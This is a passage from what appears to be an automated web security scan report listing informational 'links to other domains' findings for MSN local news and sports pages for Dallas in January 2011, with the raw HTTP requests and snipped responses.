<a href="http://www.bing.com/events/search?q=Harlem Globetrotters&p1=[Events+source="vertical"+qzeventid="z149225805"]&form=MSNLAP" title="Harlem Globetrotters">Harlem Globetrotters</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP" title="2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks">2011 Dallas Super Bowl Weekend - Fantasy Party - ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP" title="2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta">2011 Super Bowl XLV Weekend Party - Hosted by the ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP" title="P. Diddy's Super Bowl Grand Finale Party">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP" title="Penthouse Magazine "Super Party 2011" Super Bowl event">Penthouse Magazine "Super Party 2011" Super Bowl ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP" title="Everything's Bigger in Texas Party DUEX Super Celebrity Party">Everything's Bigger in Texas Party DUEX Super ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP" title="NFLX After Dark at The NFL Experience">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c100"]&form=MSNLAP">Arts & crafts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c500"]&form=MSNLAP">Education & campus</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1000"]&form=MSNLAP">Performing arts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c200"]&form=MSNLAP">Business & tech</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c600"]&form=MSNLAP">Fairs & festivals</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1100"]&form=MSNLAP">Shopping</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c300"]&form=MSNLAP">Community</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c700"]&form=MSNLAP">Food & dining</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1200"]&form=MSNLAP">Sports & outdoors</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c400"]&form=MSNLAP">Dance</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c800"]&form=MSNLAP">Music</a></li><li class="last"><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1300"]&form=MSNLAP">Visual arts</a>
...[SNIP]...
<a href="http://movies.msn.com/Movies/movie.aspx?m=2277707&mp=m" title="The Mechanic"><img alt="The Mechanic" src="http://entimg.s-msn.com/i/CS/088884h1.jpg" width="130" height="190" /></a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP">NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Harlem Globetrotters&p1=[Events+source="vertical"+qzeventid="z149225805"]&form=MSNLAP">Harlem Globetrotters</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=O Brother, Werewolf Art Thou?&p1=[Events+source="vertical"+qzeventid="z158259485"]&form=MSNLAP">O Brother, Werewolf Art Thou?</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Dinosaurs Unearthed&p1=[Events+source="vertical"+qzeventid="z148859065"]&form=MSNLAP">Dinosaurs Unearthed</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Private NFL Experience Courtesy of PepsiCo and Kroger&p1=[Events+source="vertical"+qzeventid="z161984965"]&form=MSNLAP">Private NFL Experience Courtesy of PepsiCo and Kroger</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&resize=false">Feedback</a>
...[SNIP]...

22.123. http://local.redacted/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/news.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/twitter/search?go=&form=MSNLEC&q=Dallas,TX
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344851&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&resize=false

Request

GET /news.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d1a44c75edce492494efb08d3d9ec0da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0B104FD17770449C9E5513324E88DF6E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:31 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344851&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<img width="16" height="20" alt="twitter" title="twitter" src="http://blstb.redacted/i/95/2845F8ED7FD4376D1898516E22F8.png" /><a href="http://www.bing.com/twitter/search?go=&form=MSNLEC&q=Dallas,TX">Read Local Tweets</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&resize=false">Feedback</a>
...[SNIP]...

22.124. http://local.redacted/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/news.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/twitter/search?go=&form=MSNLEC&q=Dallas,TX
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406219&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&resize=false

Request

GET /news.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b233315edaf94b3c8165d45cda852309; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7E3FFAEC13A6476C8C4F97DF9E4C783D; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406219&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<img width="16" height="20" alt="twitter" title="twitter" src="http://blstb.redacted/i/95/2845F8ED7FD4376D1898516E22F8.png" /><a href="http://www.bing.com/twitter/search?go=&form=MSNLEC&q=Dallas,TX">Read Local Tweets</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&resize=false">Feedback</a>
...[SNIP]...

22.125. http://local.redacted/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/sports.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/sports.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/cbk/standings
http://msn.foxsports.com/cbk/story/Air-Force-66-TCU-65-64413866
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175
http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904
http://msn.foxsports.com/cbk/story/Denver-80-North-Texas-67-66077993
http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281
http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486
http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261
http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535
http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539
http://msn.foxsports.com/cbk/story/MissouriTexas-Preview-94031904
http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554
http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786
http://msn.foxsports.com/cbk/story/Oklahoma-83-Texas-Tech-74-06947696
http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338
http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706
http://msn.foxsports.com/cbk/story/SMU-75-Rice-68-35158885
http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346
http://msn.foxsports.com/cbk/story/Sadler-must-look-beyond-borders-for-future-Huskers-50872138
http://msn.foxsports.com/cbk/story/Texas-Longhorns-topple-Missouri-Tigers-012911
http://msn.foxsports.com/cbk/story/Texas-Tech-72-Nebraska-71-91656634
http://msn.foxsports.com/cbk/story/Texas-Tech-75-Oklahoma-St-74-80642690
http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109
http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240
http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869
http://msn.foxsports.com/cbk/story/TexasArlington-83-Texas-St-66-30375558
http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212
http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638
http://msn.foxsports.com/cbk/team?categoryId=71650
http://msn.foxsports.com/cbk/team?categoryId=71780
http://msn.foxsports.com/cbk/team?categoryId=71871
http://msn.foxsports.com/cbk/team?categoryId=71872
http://msn.foxsports.com/cbk/team?categoryId=71874
http://msn.foxsports.com/cbk/team?categoryId=71922
http://msn.foxsports.com/cbk/team?categoryId=71926
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926
http://msn.foxsports.com/cbk/teamStats?categoryId=71650
http://msn.foxsports.com/cbk/teamStats?categoryId=71780
http://msn.foxsports.com/cbk/teamStats?categoryId=71871
http://msn.foxsports.com/cbk/teamStats?categoryId=71872
http://msn.foxsports.com/cbk/teamStats?categoryId=71874
http://msn.foxsports.com/cbk/teamStats?categoryId=71922
http://msn.foxsports.com/cbk/teamStats?categoryId=71926
http://msn.foxsports.com/cfb
http://msn.foxsports.com/cfb/standings
http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143
http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010
http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926
http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273
http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560
http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910
http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018
http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026
http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111
http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411
http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711
http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865
http://msn.foxsports.com/cfb/story/Ponder-South-win-Senior-Bowl-2410-10241756
